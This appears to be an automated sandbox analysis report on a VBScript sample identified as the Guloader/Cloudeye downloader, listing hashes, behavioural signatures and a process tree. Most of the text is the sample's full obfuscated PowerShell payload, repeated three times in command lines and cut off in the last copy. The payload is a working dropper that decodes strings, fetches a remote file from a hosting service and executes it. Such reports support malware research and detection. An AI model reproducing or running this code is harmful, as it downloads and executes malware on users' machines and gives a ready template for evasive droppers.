Analysis

  • max time kernel
    147s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    25/09/2024, 02:25

General

  • Target

    ba44e394e0d9dc4fe9d15a2297f8ecbc3affb80100003b5c57898269261b311b.vbs

  • Size

    32KB

  • MD5

    e198fb2a66ebacac2d2a06c6d39b578c

  • SHA1

    ac1353658fffdfba77beaa6ce1c42254ba02346f

  • SHA256

    ba44e394e0d9dc4fe9d15a2297f8ecbc3affb80100003b5c57898269261b311b

  • SHA512

    4c28d4eee277d495d2596eeab0841933ac84f5f72b12f64d9281b4023f7e9c32f22d2368bb634252fdcac4f2b79b5cfe32cdbff015f4dc8a2c6f6acdb1317fe5

  • SSDEEP

    384:3PA0Xp74bQBupq5CMat1f9wxdaW+e9FfXpcHIBSi8g:/bFsq5CHePaWB9FfXp9Si8g

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ba44e394e0d9dc4fe9d15a2297f8ecbc3affb80100003b5c57898269261b311b.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1952
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Udmattelserne Omkredsene Sekstanters Registermrkernes Befalingsmndene Oprikkerne Momenters #>;$Lynlaase113='Aelodicon';<#Sildens cafeliv roid Pagesize Haanenes #>;$Semipractical=$host.PrivateData;If ($Semipractical) {$Etymologiseres++;}function Ferulaceous15($Mesodevonic){$Eres=$Mesodevonic.Length-$Etymologiseres;for( $Silkworm=5;$Silkworm -lt $Eres;$Silkworm+=6){$Ablatives+=$Mesodevonic[$Silkworm];}$Ablatives;}function Graenseprovins($Acetation4){ . ($Accosting) ($Acetation4);}$Huntswoman=Ferulaceous15 '.ujonMHatt o al,mzPhenoi Aktil ColllSpadaa Unca/indsa5Aflsn.Vik r0P ess Paast(YarelWImi ai FrisnQuartdpos soTilbawVin,esSlegf g.schNFlintT kti Lutze1Aarss0 Fab .Dumri0,ovov; Virk TenuoWSonaniF dign alt6Wante4Brneg;Scree opblxUnder6Genst4Forgr;Trans AgricrKamervPlan.:H,pta1el oq2af.in1Subsi.irre.0 V lu)Unogl OrdklGmugieeUs igcadelsk Re.fo Ind,/Samse2 Blom0 Inve1Xrwor0Ammun0Lystr1Sphe 0 Padd1Udlsn ransF TaariDagabrslot eElainfNonu oElectxEndwa/Dundy1Galat2Udtrk1 Regi..riks0Res,g ';$Uncounterfeit=Ferulaceous15 ',dtruUCharlsPhiloESonorr U ef-PrudeaHudorG.natoeDextrNAdresT Data ';$Monopoliseret=Ferulaceous15 'OmdoehFilmet StabtOutstpHyp.isSexdm:Blodp/ Unpa/DilitdDoctrrMorfoiAnsigvThaumeKatol.karrigApporo Eksto Coung LasclAr hbeEnd,r.Nonv c bilsoIllegmOpkas/ W aru earnccoun.? BolceRigtixAfgifpForraoEnticrheralt ,aml=u.dendP raloV.asawKn denScintlFunktoEks ea taskdHypoz&E ucai UnordVgkon= Over1PheneKUnd ry JereOUnendO.ysekRaktiei mimiMInddrESvolvR Pe cmUppbaR Len 1mono TSextix entek Pri EustraYMinim7Tweedv S.il8JurisS P lygQuin.6S.iseVSubjuY AcartObstr0BinitrausgeuKorthQE gerJCholaxdammi ';$Uretfrdighed=Ferulaceous15 'Cotic>Hotel ';$Accosting=Ferulaceous15 'KikkeIFlitwEUnappX R.st ';$Ectal='Constrainingly';$Pienanny = Ferulaceous15 'Ac ene huslcd rmahSchapo gerf Kreat%Buksea AnpapForespgarned bonna.lutotTwinbaBacte% Iso \NepheMBlg.biTorbjc chatrBndeloEnkesc SimuhTr mbi Fakkp ener1Flles.ChiviATrskrnVueruaA.bet Desir&Amoul&.lisi Ano ye PolicL dighPa tsoBinau WatchtNring ';Graenseprovins (Ferulaceous15 'Kevel$ yoplgNo trl N.nto .nisb CyklaOpretl Skol:FangoFForebi HardxpasiluGtepapCoole= onsi(So,ricMisfom ndsvdLuder Unadd/OptagcU vne Ernri$H useP,irmeiAdaiveA eyrnUmpedaEmbarnMortanReeary S,ap)Ar,bi ');Graenseprovins (Ferulaceous15 'K.rri$AfhaagGravhlUnweaoVindib ReliaHe eblStyrk:VisorAC.inof CommtSte.srStupiy Ba nkPlumen anoriNu linTrishgOutlesMicos=Ansv $ Un,iMBodiloHikulnJetmao buckpalertoS,vvrl Pr.riDiamasK.taleSept r Dyspeund rt mbil. rmeosVeallpPlasml ObseiEnchatAffek(Aadse$ TyksUeuph r Smuge DavitAugitf DivirS.attdF ssiiPaletgBordlhKonsteCr,tidSulf )Anven ');Graenseprovins (Ferulaceous15 'Incip[Dil tNTilbae SviptOstra.EmperSLovtieCushir esilvHomoliPongicHoff eMorb,P Barbo PoniiMusclnknarrt Thr.MkjestaCensunFre faUbnhrgord,eePilchrstaal]Unq.i:Unfel:IndivSsemi eAt,anc Variu UnderStenriImpu.tWilfuyDor iPPerperSei.eoBaj dt Egoio ofecUropfoPuc elNee l Om,et=Floki high[ NathNarianeUnloctKlini. eedmS metaeTeoricForuruU clarT.geriSolvitmandayMonofPM.nthr ovruoW eelt Mrteo Lat cCarmioafreglAlfaqTInf rySamlepU cireXe,ox] K,ra:Aniso:BarytT BrnllKonststrans1 Forb2.uffl ');$Monopoliseret=$Aftryknings[0];$Phyllamorph237= (Ferulaceous15 'Bailm$ pariGButeolStatuOTubipBReinvaKrftsLTurlu:Koin,IBelnnn.ekveHUnrecaOrto L DugpeRab ir KobbEDilatsUnadm=NideoNHandfEProduw Spid-bundgo CaneBEvaneJ PodaeP.ojec ntrt avty K llis Disky Becls Metat Betee dlgsMspek .Studin Vid ELa.tst.katt.PonerW Ci lED.forBPlataCtft nLVirkei TokoeBv,esnFrithT');$Phyllamorph237+=$Fixup[1];Graenseprovins ($Phyllamorph237);Graenseprovins (Ferulaceous15 'S ksm$RespoIsup,rn Cri hKildnaArbejlDiocoe UnglrFllese RanesSk ff. onseHAfsvieNummeare rod ButieHydror frossCryst[A ton$Prot U KrslnVeligcO erio rhvu Tvinn.ilsat.horeeFlaglrAxlikf mpate PigeiAgonitTv,ng]Pharm=Droge$Ega iHRazoruP ntenPant tMoldisDesilw rticoSpagem ArchaMedi nRegna ');$Unassassinated=Ferulaceous15 ' Osob$ CortIMellen SymmhPo tuaAl uilAftrkeColorr KongeFrkkesOpula. AphtDHaiveo Hyo wT.temnafgudlKejseo,ivska SldedLevogF PentiWrithlUn ere Unde( atab$StortMDuopooJulian,uskioBigaepskvadoVoldtlOvertiImpelsOsmane Aut raut,cep nsatClutt,Har.o$UlotrPUdtr,a Percs Van sSe,boafaceln KrlitSadomeTi wirUbev n.ilkle UnthsF rba)Clois ';$Passanternes=$Fixup[0];Graenseprovins (Ferulaceous15 'Halle$DvnldgTherml RundoRustib O ttATerapl Afgr:LemonHPtyalAGunsmAUl,lifHubsssUnexp=preli(Buc eT BanceH,abasTakletSize - i,dePTiffaa Epo,T Kon hAchil Forkr$Mis,epThor a Sk rS SymbSBlodfA.ecimNSupratBemaeEOversr SubwnMoo nE EnersG,uss) stri ');while (!$Haafs) {Graenseprovins (Ferulaceous15 ' Tils$TilregDrueslSa rio DybsbB.lsaaPsoralCanth:pseudP Bom rPrereeGenbrq TilduSe,ime peralB.gen= Hy o$Danget Chagr Co.duTil aeUr nv ') ;Graenseprovins $Unassassinated;Graenseprovins (Ferulaceous15 'HanebSYndl tTarata Fri rCorditMow d-ForudSSylvil Gge ePa.rie .mbep kse Paren4U son ');Graenseprovins (Ferulaceous15 ' Thor$OpaqugHa idl F,ulorsonnbBuketaHabillDebat:SprinHTi rgaGa ldaAa skf Regis Ekss=Mirak( poteTKonfieFors sIdematUnfri-ReenlPL eseaGurnetK mpkhPaxiu Accol$Inv lPA lisaE,bles OrbisHygroa Udt nDel ntUdfrde U rer eaksnsmagse RespsUnder)Or.de ') ;Graenseprovins (Ferulaceous15 ' Bide$Dob egIn ralAttrao Bleab SydvaBrummlSpiny: UltrC Mot.o Strir,narerStutteT otssPatinp CabroAd umn loakdfourre tonnPrinctP efusSlatihSamariD gerpGenet=Reli $SytilgTaarnlStoicoSpattbDecena Skutl Lor.:DebugPL ncaoOverelLevesyP.akkiR ndedRasurrFur aoUnimps U,diiBia,rs N ss+Sempe+Anako%tufta$ConcoANdbref A prt Indhrd nceyYpur kFlo inSideripokalnMetacg Soris soft.NykalcTroggoAfhrdu ruen P.eftDdema ') ;$Monopoliseret=$Aftryknings[$Correspondentship];}$Strafferegistrenes239=332230;$Hundehvalpene=29477;Graenseprovins (Ferulaceous15 ' und$KonkugMa.lolVirksoPapilbN,geraPolyhlB.neg:UvsencEnormaAgenduLimstd paleaSt mmeBlomk Aztec=Doll oversGPlen e VisntTusin-BradyCIndskoCurumnSp totBenzyeTronanAffaltHeau, Hofso$RntgePP eria HorisSagres ndera ScrunRarert RrbleRealirGi,penD ooleDownhsstudi ');Graenseprovins (Ferulaceous15 ' olon$ Kistgstavrlt enso OverbDaugha ScaflTawny:dubleTNoveliSkolelUdtrksc,ppetM gilr,ygosa Ber.nTid tspedompsaturo ComprC nchtfund eSkader Grooe ElecdPyreneAssev eko=gui.e Frugt[ShlumSBlindyDreams Prect CotteSupvrm Pare.TransCStipeovid,rn BetjvImpereTabitrTe sttB wal]terri:Isbjr:.onpaFglacirGuachodi tomBur eB ,orda MurbsUspileTauto6Anti.4SisseSu,bectPam.hrMov eiln denAdamsgUrino(Udsm,$Sectic ForsaOlieruStil dSa loaGrayceCappu)T,pab ');Graenseprovins (Ferulaceous15 'S.uds$Portrgunclel JudooAntipbBran.au ragl oble: M,slNT gstoBro.bn DictrI.tegess.nmtLak fiZafferUdstuePrognmUn.lueS vtanDictrtSyste Komp=Polye .hsde[klub S EtioyBordksYdendtStigbeDatasmUdgiv.Arro.T d ngeFravrx Rob.tPum e.FrnutEAutisnN,urocAno ooPh.red atoviGyl,enTrafigPeakk]Canke:misso:bl mmAMenupSOver CsituaINereiIbedri. EvanGVarmheKlosetPotteSFoliet CamorAndroiD natn Sporg nond(Fiske$AsleeT AfriiIn,erlNecrosHek,etFrugtr.paalaReturnClimas c sppG soloA tegrravnetTelefe GaterKosteeFo madAtamaeSkden)Oprre ');Graenseprovins (Ferulaceous15 'Tuj.e$PhagogSubselUdv,do besobUndera MccalKarto: porSPaatrtSvaleoNikanvNonintnight=di,co$AntihNOpby oAr,ejn s rerE soreMarketSisteiLuigirDe bieRuttemGgegue CottnRiskrtRecus.OwrehsAkkomuVar ibEmi asPre,atridserDecori.olitnOverdgOutwo(Prior$pastrSArubatRusserSfreraAnticfSjlegfRo,ane ChanrYokere Pigwg ,edkifupmasAnalot TillrS dwaeRavnenNondeeUgen sElekt2 Tote3overu9,ilow,Humfr$galerHSkriduBidi nphiltdRivebeAfdelhUntinvKbstaaUlfhilant,qp,ynthedagsonEstiveo kal)Lo ke ');Graenseprovins $Stovt;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2236
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Microchip1.Ana && echo t"
        3⤵
          PID:2900
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Udmattelserne Omkredsene Sekstanters Registermrkernes Befalingsmndene Oprikkerne Momenters #>;$Lynlaase113='Aelodicon';<#Sildens cafeliv roid Pagesize Haanenes #>;$Semipractical=$host.PrivateData;If ($Semipractical) {$Etymologiseres++;}function Ferulaceous15($Mesodevonic){$Eres=$Mesodevonic.Length-$Etymologiseres;for( $Silkworm=5;$Silkworm -lt $Eres;$Silkworm+=6){$Ablatives+=$Mesodevonic[$Silkworm];}$Ablatives;}function Graenseprovins($Acetation4){ . ($Accosting) ($Acetation4);}$Huntswoman=Ferulaceous15 '.ujonMHatt o al,mzPhenoi Aktil ColllSpadaa Unca/indsa5Aflsn.Vik r0P ess Paast(YarelWImi ai FrisnQuartdpos soTilbawVin,esSlegf g.schNFlintT kti Lutze1Aarss0 Fab .Dumri0,ovov; Virk TenuoWSonaniF dign alt6Wante4Brneg;Scree opblxUnder6Genst4Forgr;Trans AgricrKamervPlan.:H,pta1el oq2af.in1Subsi.irre.0 V lu)Unogl OrdklGmugieeUs igcadelsk Re.fo Ind,/Samse2 Blom0 Inve1Xrwor0Ammun0Lystr1Sphe 0 Padd1Udlsn ransF TaariDagabrslot eElainfNonu oElectxEndwa/Dundy1Galat2Udtrk1 Regi..riks0Res,g ';$Uncounterfeit=Ferulaceous15 ',dtruUCharlsPhiloESonorr U ef-PrudeaHudorG.natoeDextrNAdresT Data ';$Monopoliseret=Ferulaceous15 'OmdoehFilmet StabtOutstpHyp.isSexdm:Blodp/ Unpa/DilitdDoctrrMorfoiAnsigvThaumeKatol.karrigApporo Eksto Coung LasclAr hbeEnd,r.Nonv c bilsoIllegmOpkas/ W aru earnccoun.? BolceRigtixAfgifpForraoEnticrheralt ,aml=u.dendP raloV.asawKn denScintlFunktoEks ea taskdHypoz&E ucai UnordVgkon= Over1PheneKUnd ry JereOUnendO.ysekRaktiei mimiMInddrESvolvR Pe cmUppbaR Len 1mono TSextix entek Pri EustraYMinim7Tweedv S.il8JurisS P lygQuin.6S.iseVSubjuY AcartObstr0BinitrausgeuKorthQE gerJCholaxdammi ';$Uretfrdighed=Ferulaceous15 'Cotic>Hotel ';$Accosting=Ferulaceous15 'KikkeIFlitwEUnappX R.st ';$Ectal='Constrainingly';$Pienanny = Ferulaceous15 'Ac ene huslcd rmahSchapo gerf Kreat%Buksea AnpapForespgarned bonna.lutotTwinbaBacte% Iso \NepheMBlg.biTorbjc chatrBndeloEnkesc SimuhTr mbi Fakkp ener1Flles.ChiviATrskrnVueruaA.bet Desir&Amoul&.lisi Ano ye PolicL dighPa tsoBinau WatchtNring ';Graenseprovins (Ferulaceous15 'Kevel$ yoplgNo trl N.nto .nisb CyklaOpretl Skol:FangoFForebi HardxpasiluGtepapCoole= onsi(So,ricMisfom ndsvdLuder Unadd/OptagcU vne Ernri$H useP,irmeiAdaiveA eyrnUmpedaEmbarnMortanReeary S,ap)Ar,bi ');Graenseprovins (Ferulaceous15 'K.rri$AfhaagGravhlUnweaoVindib ReliaHe eblStyrk:VisorAC.inof CommtSte.srStupiy Ba nkPlumen anoriNu linTrishgOutlesMicos=Ansv $ Un,iMBodiloHikulnJetmao buckpalertoS,vvrl Pr.riDiamasK.taleSept r Dyspeund rt mbil. rmeosVeallpPlasml ObseiEnchatAffek(Aadse$ TyksUeuph r Smuge DavitAugitf DivirS.attdF ssiiPaletgBordlhKonsteCr,tidSulf )Anven ');Graenseprovins (Ferulaceous15 'Incip[Dil tNTilbae SviptOstra.EmperSLovtieCushir esilvHomoliPongicHoff eMorb,P Barbo PoniiMusclnknarrt Thr.MkjestaCensunFre faUbnhrgord,eePilchrstaal]Unq.i:Unfel:IndivSsemi eAt,anc Variu UnderStenriImpu.tWilfuyDor iPPerperSei.eoBaj dt Egoio ofecUropfoPuc elNee l Om,et=Floki high[ NathNarianeUnloctKlini. eedmS metaeTeoricForuruU clarT.geriSolvitmandayMonofPM.nthr ovruoW eelt Mrteo Lat cCarmioafreglAlfaqTInf rySamlepU cireXe,ox] K,ra:Aniso:BarytT BrnllKonststrans1 Forb2.uffl ');$Monopoliseret=$Aftryknings[0];$Phyllamorph237= (Ferulaceous15 'Bailm$ pariGButeolStatuOTubipBReinvaKrftsLTurlu:Koin,IBelnnn.ekveHUnrecaOrto L DugpeRab ir KobbEDilatsUnadm=NideoNHandfEProduw Spid-bundgo CaneBEvaneJ PodaeP.ojec ntrt avty K llis Disky Becls Metat Betee dlgsMspek .Studin Vid ELa.tst.katt.PonerW Ci lED.forBPlataCtft nLVirkei TokoeBv,esnFrithT');$Phyllamorph237+=$Fixup[1];Graenseprovins ($Phyllamorph237);Graenseprovins (Ferulaceous15 'S ksm$RespoIsup,rn Cri hKildnaArbejlDiocoe UnglrFllese RanesSk ff. onseHAfsvieNummeare rod ButieHydror frossCryst[A ton$Prot U KrslnVeligcO erio rhvu Tvinn.ilsat.horeeFlaglrAxlikf mpate PigeiAgonitTv,ng]Pharm=Droge$Ega iHRazoruP ntenPant tMoldisDesilw rticoSpagem ArchaMedi nRegna ');$Unassassinated=Ferulaceous15 ' Osob$ CortIMellen SymmhPo tuaAl uilAftrkeColorr KongeFrkkesOpula. AphtDHaiveo Hyo wT.temnafgudlKejseo,ivska SldedLevogF PentiWrithlUn ere Unde( atab$StortMDuopooJulian,uskioBigaepskvadoVoldtlOvertiImpelsOsmane Aut raut,cep nsatClutt,Har.o$UlotrPUdtr,a Percs Van sSe,boafaceln KrlitSadomeTi wirUbev n.ilkle UnthsF rba)Clois ';$Passanternes=$Fixup[0];Graenseprovins (Ferulaceous15 'Halle$DvnldgTherml RundoRustib O ttATerapl Afgr:LemonHPtyalAGunsmAUl,lifHubsssUnexp=preli(Buc eT BanceH,abasTakletSize - i,dePTiffaa Epo,T Kon hAchil Forkr$Mis,epThor a Sk rS SymbSBlodfA.ecimNSupratBemaeEOversr SubwnMoo nE EnersG,uss) stri ');while (!$Haafs) {Graenseprovins (Ferulaceous15 ' Tils$TilregDrueslSa rio DybsbB.lsaaPsoralCanth:pseudP Bom rPrereeGenbrq TilduSe,ime peralB.gen= Hy o$Danget Chagr Co.duTil aeUr nv ') ;Graenseprovins $Unassassinated;Graenseprovins (Ferulaceous15 'HanebSYndl tTarata Fri rCorditMow d-ForudSSylvil Gge ePa.rie .mbep kse Paren4U son ');Graenseprovins (Ferulaceous15 ' Thor$OpaqugHa idl F,ulorsonnbBuketaHabillDebat:SprinHTi rgaGa ldaAa skf Regis Ekss=Mirak( poteTKonfieFors sIdematUnfri-ReenlPL eseaGurnetK mpkhPaxiu Accol$Inv lPA lisaE,bles OrbisHygroa Udt nDel ntUdfrde U rer eaksnsmagse RespsUnder)Or.de ') ;Graenseprovins (Ferulaceous15 ' Bide$Dob egIn ralAttrao Bleab SydvaBrummlSpiny: UltrC Mot.o Strir,narerStutteT otssPatinp CabroAd umn loakdfourre tonnPrinctP efusSlatihSamariD gerpGenet=Reli $SytilgTaarnlStoicoSpattbDecena Skutl Lor.:DebugPL ncaoOverelLevesyP.akkiR ndedRasurrFur aoUnimps U,diiBia,rs N ss+Sempe+Anako%tufta$ConcoANdbref A prt Indhrd nceyYpur kFlo inSideripokalnMetacg Soris soft.NykalcTroggoAfhrdu ruen P.eftDdema ') ;$Monopoliseret=$Aftryknings[$Correspondentship];}$Strafferegistrenes239=332230;$Hundehvalpene=29477;Graenseprovins (Ferulaceous15 ' und$KonkugMa.lolVirksoPapilbN,geraPolyhlB.neg:UvsencEnormaAgenduLimstd paleaSt mmeBlomk Aztec=Doll oversGPlen e VisntTusin-BradyCIndskoCurumnSp totBenzyeTronanAffaltHeau, Hofso$RntgePP eria HorisSagres ndera ScrunRarert RrbleRealirGi,penD ooleDownhsstudi ');Graenseprovins (Ferulaceous15 ' olon$ Kistgstavrlt enso OverbDaugha ScaflTawny:dubleTNoveliSkolelUdtrksc,ppetM gilr,ygosa Ber.nTid tspedompsaturo ComprC nchtfund eSkader Grooe ElecdPyreneAssev eko=gui.e Frugt[ShlumSBlindyDreams Prect CotteSupvrm Pare.TransCStipeovid,rn BetjvImpereTabitrTe sttB wal]terri:Isbjr:.onpaFglacirGuachodi tomBur eB ,orda MurbsUspileTauto6Anti.4SisseSu,bectPam.hrMov eiln denAdamsgUrino(Udsm,$Sectic ForsaOlieruStil dSa loaGrayceCappu)T,pab ');Graenseprovins (Ferulaceous15 'S.uds$Portrgunclel JudooAntipbBran.au ragl oble: M,slNT gstoBro.bn DictrI.tegess.nmtLak fiZafferUdstuePrognmUn.lueS vtanDictrtSyste Komp=Polye .hsde[klub S EtioyBordksYdendtStigbeDatasmUdgiv.Arro.T d ngeFravrx Rob.tPum e.FrnutEAutisnN,urocAno ooPh.red atoviGyl,enTrafigPeakk]Canke:misso:bl mmAMenupSOver CsituaINereiIbedri. EvanGVarmheKlosetPotteSFoliet CamorAndroiD natn Sporg nond(Fiske$AsleeT AfriiIn,erlNecrosHek,etFrugtr.paalaReturnClimas c sppG soloA tegrravnetTelefe GaterKosteeFo madAtamaeSkden)Oprre ');Graenseprovins (Ferulaceous15 'Tuj.e$PhagogSubselUdv,do besobUndera MccalKarto: porSPaatrtSvaleoNikanvNonintnight=di,co$AntihNOpby oAr,ejn s rerE soreMarketSisteiLuigirDe bieRuttemGgegue CottnRiskrtRecus.OwrehsAkkomuVar ibEmi asPre,atridserDecori.olitnOverdgOutwo(Prior$pastrSArubatRusserSfreraAnticfSjlegfRo,ane ChanrYokere Pigwg ,edkifupmasAnalot TillrS dwaeRavnenNondeeUgen sElekt2 Tote3overu9,ilow,Humfr$galerHSkriduBidi nphiltdRivebeAfdelhUntinvKbstaaUlfhilant,qp,ynthedagsonEstiveo kal)Lo ke ');Graenseprovins $Stovt;"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2588
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Udmattelserne Omkredsene Sekstanters Registermrkernes Befalingsmndene Oprikkerne Momenters #>;$Lynlaase113='Aelodicon';<#Sildens cafeliv roid Pagesize Haanenes #>;$Semipractical=$host.PrivateData;If ($Semipractical) {$Etymologiseres++;}function Ferulaceous15($Mesodevonic){$Eres=$Mesodevonic.Length-$Etymologiseres;for( $Silkworm=5;$Silkworm -lt $Eres;$Silkworm+=6){$Ablatives+=$Mesodevonic[$Silkworm];}$Ablatives;}function Graenseprovins($Acetation4){ . ($Accosting) ($Acetation4);}$Huntswoman=Ferulaceous15 '.ujonMHatt o al,mzPhenoi Aktil ColllSpadaa Unca/indsa5Aflsn.Vik r0P ess Paast(YarelWImi ai FrisnQuartdpos soTilbawVin,esSlegf g.schNFlintT kti Lutze1Aarss0 Fab .Dumri0,ovov; Virk TenuoWSonaniF dign alt6Wante4Brneg;Scree opblxUnder6Genst4Forgr;Trans AgricrKamervPlan.:H,pta1el oq2af.in1Subsi.irre.0 V lu)Unogl OrdklGmugieeUs igcadelsk Re.fo Ind,/Samse2 Blom0 Inve1Xrwor0Ammun0Lystr1Sphe 0 Padd1Udlsn ransF TaariDagabrslot eElainfNonu oElectxEndwa/Dundy1Galat2Udtrk1 Regi..riks0Res,g ';$Uncounterfeit=Ferulaceous15 ',dtruUCharlsPhiloESonorr U ef-PrudeaHudorG.natoeDextrNAdresT Data ';$Monopoliseret=Ferulaceous15 'OmdoehFilmet StabtOutstpHyp.isSexdm:Blodp/ Unpa/DilitdDoctrrMorfoiAnsigvThaumeKatol.karrigApporo Eksto Coung LasclAr hbeEnd,r.Nonv c bilsoIllegmOpkas/ W aru earnccoun.? BolceRigtixAfgifpForraoEnticrheralt ,aml=u.dendP raloV.asawKn denScintlFunktoEks ea taskdHypoz&E ucai UnordVgkon= Over1PheneKUnd ry JereOUnendO.ysekRaktiei mimiMInddrESvolvR Pe cmUppbaR Len 1mono TSextix entek Pri EustraYMinim7Tweedv S.il8JurisS P lygQuin.6S.iseVSubjuY AcartObstr0BinitrausgeuKorthQE gerJCholaxdammi ';$Uretfrdighed=Ferulaceous15 'Cotic>Hotel ';$Accosting=Ferulaceous15 'KikkeIFlitwEUnappX R.st ';$Ectal='Constrainingly';$Pienanny = Ferulaceous15 'Ac ene huslcd rmahSchapo gerf Kreat%Buksea AnpapForespgarned bonna.lutotTwinbaBacte% Iso \NepheMBlg.biTorbjc chatrBndeloEnkesc SimuhTr mbi Fakkp ener1Flles.ChiviATrskrnVueruaA.bet Desir&Amoul&.lisi Ano ye PolicL dighPa tsoBinau WatchtNring ';Graenseprovins (Ferulaceous15 'Kevel$ yoplgNo trl N.nto .nisb CyklaOpretl Skol:FangoFForebi HardxpasiluGtepapCoole= onsi(So,ricMisfom ndsvdLuder Unadd/OptagcU vne Ernri$H useP,irmeiAdaiveA eyrnUmpedaEmbarnMortanReeary S,ap)Ar,bi ');Graenseprovins (Ferulaceous15 'K.rri$AfhaagGravhlUnweaoVindib ReliaHe eblStyrk:VisorAC.inof CommtSte.srStupiy Ba nkPlumen anoriNu linTrishgOutlesMicos=Ansv $ Un,iMBodiloHikulnJetmao buckpalertoS,vvrl Pr.riDiamasK.taleSept r Dyspeund rt mbil. rmeosVeallpPlasml ObseiEnchatAffek(Aadse$ TyksUeuph r Smuge DavitAugitf DivirS.attdF ssiiPaletgBordlhKonsteCr,tidSulf )Anven ');Graenseprovins (Ferulaceous15 'Incip[Dil tNTilbae SviptOstra.EmperSLovtieCushir esilvHomoliPongicHoff eMorb,P Barbo PoniiMusclnknarrt Thr.MkjestaCensunFre faUbnhrgord,eePilchrstaal]Unq.i:Unfel:IndivSsemi eAt,anc Variu UnderStenriImpu.tWilfuyDor iPPerperSei.eoBaj dt Egoio ofecUropfoPuc elNee l Om,et=Floki high[ NathNarianeUnloctKlini. eedmS metaeTeoricForuruU clarT.geriSolvitmandayMonofPM.nthr ovruoW eelt Mrteo Lat cCarmioafreglAlfaqTInf rySamlepU cireXe,ox] K,ra:Aniso:BarytT BrnllKonststrans1 Forb2.uffl ');$Monopoliseret=$Aftryknings[0];$Phyllamorph237= (Ferulaceous15 'Bailm$ pariGButeolStatuOTubipBReinvaKrftsLTurlu:Koin,IBelnnn.ekveHUnrecaOrto L DugpeRab ir KobbEDilatsUnadm=NideoNHandfEProduw Spid-bundgo CaneBEvaneJ PodaeP.ojec ntrt avty K llis Disky Becls Metat Betee dlgsMspek .Studin Vid ELa.tst.katt.PonerW Ci lED.forBPlataCtft nLVirkei TokoeBv,esnFrithT');$Phyllamorph237+=$Fixup[1];Graenseprovins ($Phyllamorph237);Graenseprovins (Ferulaceous15 'S ksm$RespoIsup,rn Cri hKildnaArbejlDiocoe UnglrFllese RanesSk ff. onseHAfsvieNummeare rod ButieHydror frossCryst[A ton$Prot U KrslnVeligcO erio rhvu Tvinn.ilsat.horeeFlaglrAxlikf mpate PigeiAgonitTv,ng]Pharm=Droge$Ega iHRazoruP ntenPant tMoldisDesilw rticoSpagem ArchaMedi nRegna ');$Unassassinated=Ferulaceous15 ' Osob$ CortIMellen SymmhPo tuaAl uilAftrkeColorr KongeFrkkesOpula. AphtDHaiveo Hyo wT.temnafgudlKejseo,ivska SldedLevogF PentiWrithlUn ere Unde( atab$StortMDuopooJulian,uskioBigaepskvadoVoldtlOvertiImpelsOsmane Aut raut,cep nsatClutt,Har.o$UlotrPUdtr,a Percs Van sSe,boafaceln KrlitSadomeTi wirUbev n.ilkle UnthsF rba)Clois ';$Passanternes=$Fixup[0];Graenseprovins (Ferulaceous15 'Halle$DvnldgTherml RundoRustib O ttATerapl Afgr:LemonHPtyalAGunsmAUl,lifHubsssUnexp=preli(Buc eT BanceH,abasTakletSize - i,dePTiffaa Epo,T Kon hAchil Forkr$Mis,epThor a Sk rS SymbSBlodfA.ecimNSupratBemaeEOversr SubwnMoo nE EnersG,uss) stri ');while (!$Haafs) {Graenseprovins (Ferulaceous15 ' Tils$TilregDrueslSa rio DybsbB.lsaaPsoralCanth:pseudP Bom rPrereeGenbrq TilduSe,ime peralB.gen= Hy o$Danget Chagr Co.duTil aeUr nv ') ;Graenseprovins $Unassassinated;Graenseprovins (Ferulaceous15 'HanebSYndl tTarata Fri rCorditMow d-ForudSSylvil Gge ePa.rie .mbep kse Paren4U son ');Graenseprovins (Ferulaceous15 ' Thor$OpaqugHa idl F,ulorsonnbBuketaHabillDebat:SprinHTi rgaGa ldaAa skf Regis Ekss=Mirak( poteTKonfieFors sIdematUnfri-ReenlPL eseaGurnetK mpkhPaxiu Accol$Inv lPA lisaE,bles OrbisHygroa Udt nDel ntUdfrde U rer eaksnsmagse RespsUnder)Or.de ') ;Graenseprovins (Ferulaceous15 ' Bide$Dob egIn ralAttrao Bleab SydvaBrummlSpiny: UltrC Mot.o Strir,narerStutteT otssPatinp CabroAd umn loakdfourre tonnPrinctP efusSlatihSamariD gerpGenet=Reli $SytilgTaarnlStoicoSpattbDecena Skutl Lor.:DebugPL ncaoOverelLevesyP.akkiR ndedRasurrFur aoUnimps U,diiBia,rs N ss+Sempe+Anako%tufta$ConcoANdbref A prt Indhrd nceyYpur kFlo inSideripokalnMetacg Soris 